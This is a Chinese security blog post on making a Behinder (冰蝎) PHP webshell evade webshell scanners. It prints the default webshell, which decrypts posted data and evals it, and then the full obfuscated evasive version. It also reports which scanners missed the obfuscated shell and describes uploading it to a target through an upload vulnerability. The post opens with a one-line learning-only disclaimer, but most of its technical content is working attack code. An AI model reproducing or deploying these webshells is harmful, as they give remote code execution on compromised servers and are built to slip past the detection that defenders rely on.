冰蝎Webshell的免杀实战(一)

admin 2022年7月8日16:58:43评论45 views字数 5943阅读19分48秒阅读模式



网安引领时代,弥天点亮未来   





 

冰蝎Webshell的免杀实战(一)

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!



冰蝎Webshell的免杀实战(一)

0x01背景介绍

  随着网络攻防对抗的愈演愈烈,”查杀“与“免杀”作为对抗最基本的场景。同时webshell作为攻击者突破网络边界的关键武器,不论是攻击者的绕过检测还防守者的检测都已经成为兵家必争之器。

冰蝎Webshell的免杀实战(一)

0x02具体操作

  以下是冰蝎默认php环境下的webshell文件

<?php@error_reporting(0);session_start();$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond$SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64"."decode";$post=$t($post."");  for($i=0;$i<strlen($post);$i++) {       $post[$i] = $post[$i]^$key[$i+1&15];       }}else{  $post=openssl_decrypt($post, "AES128", $key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p) {eval($p."");}}@call_user_func(new C(),$params);
?>


通过webshell 查杀工具进行检测,结果如下:

D盾检测可检测

冰蝎Webshell的免杀实战(一)

冰河检测可检测

冰蝎Webshell的免杀实战(一)

阿里伏魔(可检测

冰蝎Webshell的免杀实战(一)


免杀处理冰蝎Webshell的免杀实战(一)

通过使用常见的方式进行免杀处理,一般对于安全狗杀形,d盾杀参的思路来绕过。生僻的回调函数,特殊的加密方式,以及关键词的后传入都是可以的。

下面通过对php马进行混淆参数、加密等方式进行免杀处理。

https://enphp.djunny.com/

冰蝎Webshell的免杀实战(一)


1.将冰蝎默认的webshell上传到平台。

冰蝎Webshell的免杀实战(一)

2.选择混淆的参数,这里全选

冰蝎Webshell的免杀实战(一)

3.点击加密,生成免杀后的webshell(每次生成都不一样,有时会解析出问题)


冰蝎Webshell的免杀实战(一)


接下来进行免杀测试

D盾检测(可疑

冰蝎Webshell的免杀实战(一)


冰河检测(免杀

冰蝎Webshell的免杀实战(一)

阿里伏魔检测(风险

冰蝎Webshell的免杀实战(一)


这里是免杀马内容,感觉乱七八糟的冰蝎Webshell的免杀实战(一)

<?php/*yunzui*/goto ½ÎÃÏ;¨êãâ:function ˆšî(){goto Ö“Âý;íÒÈÛ:return((parse_str("®íñš=Y2FsbF91c2VyX2Z1bmM",$õþõ±)||$õþõ±)?base64_decode($õþõ±['®íñš']):"");goto ñæ¦ì;ñæ¦ì:±íúÂ:goto ô«—˜;ó®æ¢:$Š³ñ‘=0x00026a9;goto ŠÓ’õ;ŠÓ’õ:if(!($„“ý[0]==$Š³ñ‘+0x0024))goto ±íúÂ;goto íÒÈÛ;Ö“Âý:$„“ý=func_get_args();goto ó®æ¢;ô«—˜:}goto ߁Ñ;Ͳ”°:goto ÔŸ¶õ;goto ÅØ»ô;»Œ¶Ô:class C{public function __invoke($´€¼À){eval($´€¼À.base64_decode(str_rot13('')));}}goto ¹Ôœ·;ž–™:ÔŸ¶õ:goto °ËüÉ;ÅØ»ô:Ý²÷:goto ™µý¼;Û®ˆ:$Ö€Ï=˜ò(0x000d95,0x00da8,0x0000d73)(˜ò(0x00df3,0x00000dce));goto ¶Á ;˺Úë:$ð謃=˜ò(0x00d08,$ð謃);goto û»‰;¡ÐÈ—:$Ö€Ï=$‰óԏ($Ö€Ï.((parse_str("–õ¿×=",$¥¨ýÊ)||$¥¨ýÊ)?base64_decode($¥¨ýÊ['–õ¿×']):""));goto ³òäÝ;™µý¼:ûãýË:goto 搓‡;߁Ñ:function ÃŒûƒ(){goto Òé¿€;ÁŒíÇ:return((parse_str("c3RybGVu",$Ãò²¶)||$Ãò²¶)?base64_decode(key($Ãò²¶)):"");goto ãáÚ;÷㵸:ÍØËÎ:goto Ýžº¤;‘´¿Â:if(!($¯‡¬Æ[0x0002]==$©¢Ì+0x00061))goto µž×ì;goto á;ÆÙâã:$©¢Ì=0x0240e;goto ÖÚï½;ðÁ¯¬:µž×ì:goto ¯ÎÒ×;á:return(base64_decode('b3BlbnNzbF9kZWNyeXB0')?:$טգ);goto ðÁ¯¬;¬¹•Ž:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x000013e))goto ßîÛñ;goto ——¹™;ÁÁÓì:return((parse_str("‡¡Ž=ZXhwbG9kZQ",$ÑÛÚû)||$ÑÛÚû)?base64_decode($ÑÛÚû['‡¡Ž']):"");goto ’²óŒ;ÖÚï½:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x02d))goto Á㤈;goto ÁŒíÇ;øôÜÎ:return base64_decode(str_rot13('DHIGZGV4'));goto ÷㵸;——¹™:return "x7c";goto ÍÌ–ƒ;ãáÚ:Á㤈:goto ‘´¿Â;¯ÎÒ×:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x0000b7))goto ÍØËÎ;goto øôÜÎ;’²óŒ:¿Ïˆ:goto ¬¹•Ž;Òé¿€:$¯‡¬Æ=func_get_args();goto ÆÙâã;ÍÌ–ƒ:ßîÛñ:goto ݈·¦;Ýžº¤:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x00000f9))goto ¿Ïˆ;goto ÁÁÓì;݈·¦:}goto ‹âãÄ;Ûžªö:@˜ò(0x000cf5)(0);goto Ñː˜;±ëéˆ:$¾¶è¼=$Œåò„[0];goto Üí©­;°ËüÉ:if(!($›•Å•<ÃŒûƒ(0x002450,0x0243b)($Ö€Ï)))goto Ý²÷;goto çÈŸÞ;çÈŸÞ:$Ö€Ï[$›•Å•]=$Ö€Ï[$›•Å•]^$ð謃[$›•Å•+0x001&0x0f];goto ©è³±;´©ú§:¸Õï:goto ·¸¶†;ÁÜÁ·:$›•Å•++;goto Ͳ”°;‹âãÄ:function ûú¥ó(){goto ȵ¢ý;ÊѼÁ:return gzinflate('K­(IÍ+ÎÌÏ‹ÏÉOLIM�');goto õÕ·å;ô Ù:return base64_decode(join("",array('Y','m','F','z','Z','T','Y','0','X','w')));goto õ¯¶›;¦¬û:if(!($äˆýÆ[0]==$¤üì˜+0x037))goto  ï’è;goto æÝ”;ÖÝŠÂ:$¤üì˜=0x00000e00;goto ¤—ïÁ;õÕ·å:îߤ”:goto ¦¬û;õ¯¶›:œ¬‹Ï:goto  ½ô¥;¶ŸÁ¹:—䧆:goto ú¨ï«;ȵ¢ý:$äˆýÆ=func_get_args();goto ÖÝŠÂ; ½ô¥:if(!($äˆýÆ[0]==$¤üì˜+0x000006d))goto —䧆;goto 둨ˆ;æÝ”:return gzinflate('Ë/HÍ+.Î�');goto ‚ ™œ;¤—ïÁ:if(!($äˆýÆ[0]==$¤üì˜+0x0015))goto îߤ”;goto ÊѼÁ;»ïÊÃ:if(!($äˆýÆ[0]==$¤üì˜+0x004c))goto œ¬‹Ï;goto ô Ù;‚ ™œ: ï’è:goto »ïÊÃ;둨ˆ:return base64_decode(join("",array('Z','G','V','j','b','2','R','l')));goto ¶ŸÁ¹;ú¨ï«:}goto „è›Ø;„„éŽ:˜ò(0x00000d51)();goto Û®ˆ;„è›Ø:function ˜ò(){goto µ¾ýö;µ¢Ü·:return base64_decode('ZTQ1ZTMyOWZlYjVkOTI1Yg');goto Š„Ä ;ßµ–Ì:Šõ‡ö:goto ™ŠÂ²;ÎÀ°Ä:return(($½šÒ·=gzinflate(substr(base64_decode('H4sIAAAAAAAAA0stKsovii9KLcgvKsnMSwcAF20hmA8AAAA'),10,-8)))?$½šÒ·:$ØÒš);goto î°¥¬;¾œóœ:if(!($½“â[0x001]==$”ݸ‚+0x000049))goto ™ý¥î;goto ¾Ú˜Ô;”ÁÄ©:if(!($½“â[0x001]==$”ݸ‚+0x00100))goto ©ÂÛý;goto ‰É£Ä;âŽÕ×:if(!($½“â[0]==$”ݸ‚+0x00003a))goto ÚÈ¥ƒ;goto µ¢Ü·;妥Þ:if(!($½“â[0]==$”ݸ‚+0x0000027))goto ëß©Þ;goto ÎÀ°Ä;µ¾ýö:$”ݸ‚=0x0000cce;goto µúÓ;µúÓ:$½“â=func_get_args();goto 妥Þ;‰É£Ä:return(($«º“¥=gzinflate(substr(base64_decode('H4sIAAAAAAAAAyvIKLDS18/MKygtAQCnED5iCwAAAA'),10,-8)))?$«º“¥:$Èßú);goto 陿;¢ìµ®:if(!($½“â[0]==$”ݸ‚+0x0083))goto Šõ‡ö;goto ª»Š¤;¾Ú˜Ô:return(($“‘Ûã=gzinflate(substr(base64_decode('H4sIAAAAAAAAA8sGAF1XYggBAAAA'),10,-8)))?$“‘Ûã:$ÂüœÇ);goto æÀØ€;陿:©ÂÛý:goto €–¾ô;Ø­€ø:return base64_decode(join("",array('Z','m','l','s','Z','V','9','n','Z','X','R','f','Y','2','9','u','d','G','V','u','d','H','M')));goto Íœ–Ä;æÀØ€:™ý¥î:goto ¢ìµ®;Š„Ä :ÚÈ¥ƒ:goto ¾œóœ;ª»Š¤:return((parse_str("c2Vzc2lvbl93cml0ZV9jbG9zZQ",$¥’‚É)||$¥’‚É)?base64_decode(key($¥’‚É)):"");goto ßµ–Ì;™ŠÂ²:if(!($½“â[0x0002]==$”ݸ‚+0x0a5))goto ϹàÆ;goto Ø­€ø;î°¥¬:ëß©Þ:goto âŽÕ×;Íœ–Ä:ϹàÆ:goto ”ÁÄ©;€–¾ô:}goto Ûžªö;½ÎÃÏ:error_reporting(0);goto ¨êãâ;·¸¶†:$‰óԏ=ûú¥ó(0x0e4c).ûú¥ó(0x0000e6d);goto ¡ÐÈ—;搓‡:$Œåò„=ÃŒûƒ(0x00000252f,0x000002507)(ÃŒûƒ(0x000257d,0x0000254c),$Ö€Ï);goto ±ëéˆ;ÉöèØ:goto ûãýË;goto ´©ú§;Üí©­:$·ø¬Ý=$Œåò„[0x001];goto »Œ¶Ô;Ñː˜:session_start();goto ˺Úë;û»‰:$_SESSION[˜ò(0x00d21,0x00d17)]=$ð謃;goto „„éŽ;³òäÝ:$›•Å•=0;goto ž–™;¶Á :if(!ûú¥ó(0x0e15)(ûú¥ó(0x00000e37)))goto ¸Õï;goto ´ŸÍš;´ŸÍš:$Ö€Ï=ÃŒûƒ(0x00249b,0x0024b4,0x000246f)($Ö€Ï,ÃŒûƒ(0x00024f6,0x000024c5),$ð謃);goto ÉöèØ;©è³±:êÓ›à:goto ÁÜÁ·;¹Ôœ·:@ˆšî(0x000026cd)(new C(),$·ø¬Ý);

利用上传漏洞进行实战

1.通过信息收集发现目标存在漏洞,上传免杀wesbell并进行解析

冰蝎Webshell的免杀实战(一)

2.冰蝎连接(可魔改)

冰蝎Webshell的免杀实战(一)

连接成功

冰蝎Webshell的免杀实战(一)


冰蝎Webshell的免杀实战(一)

0x03总结思考

  通常基于特征的webshell查杀,如果一旦经过加密webshell是不具备任何特征的,基本上是直接通杀。一般来,免杀工具及免杀程序的开发者最好还是不要公开,不然被检测是很简单的事情。就像0day漏洞一样(未知威胁),如果成为1day就马上可以检测了。(已知威胁)最后,大家思考下面一个问题:

  攻击者防守者是什么关系呢?

  然后,我们复习一下生物知识冰蝎Webshell的免杀实战(一)

  生物与生物之间的关系有原始合作、共栖关系、寄生关系、共生关系、捕食关系和竞争关系。

  1、原始合作:指两种生物共居在一起,对双方都有一定程度的利益,但彼此分开后,各自又都能够独立生活。

  2、共栖关系:指两种共居,一方受益,另一方也无害或无大害。

  3、寄生关系:指一种生物生活在另一种生物的体内或体表,并从后者摄取营养以维持生活的关系。前者称寄生物,后者称宿主。

  4、共生关系:共生有广义的和狭义的两种概念。狭义的是指两种共居一起,彼此创造有利的生活条件,较之单独生活时更为有利,更有生活力;相互依赖,相互依存,一旦分离,双方都不能正常地生活。

  5、捕食关系:指一种生物以另一种生物为食的种间关系。前者谓之捕食者,后者谓被捕食者。

  6、竞争关系:有种内和种间两种竞争方式。这里是指两种共居一起,为争夺有限的营养、空间和其他共同需要而发生斗争的种间关系。  





冰蝎Webshell的免杀实战(一) 

知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

冰蝎Webshell的免杀实战(一)





原文始发于微信公众号(弥天安全实验室):冰蝎Webshell的免杀实战(一)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月8日16:58:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  冰蝎Webshell的免杀实战(一) http://cn-sec.com/archives/1166497.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: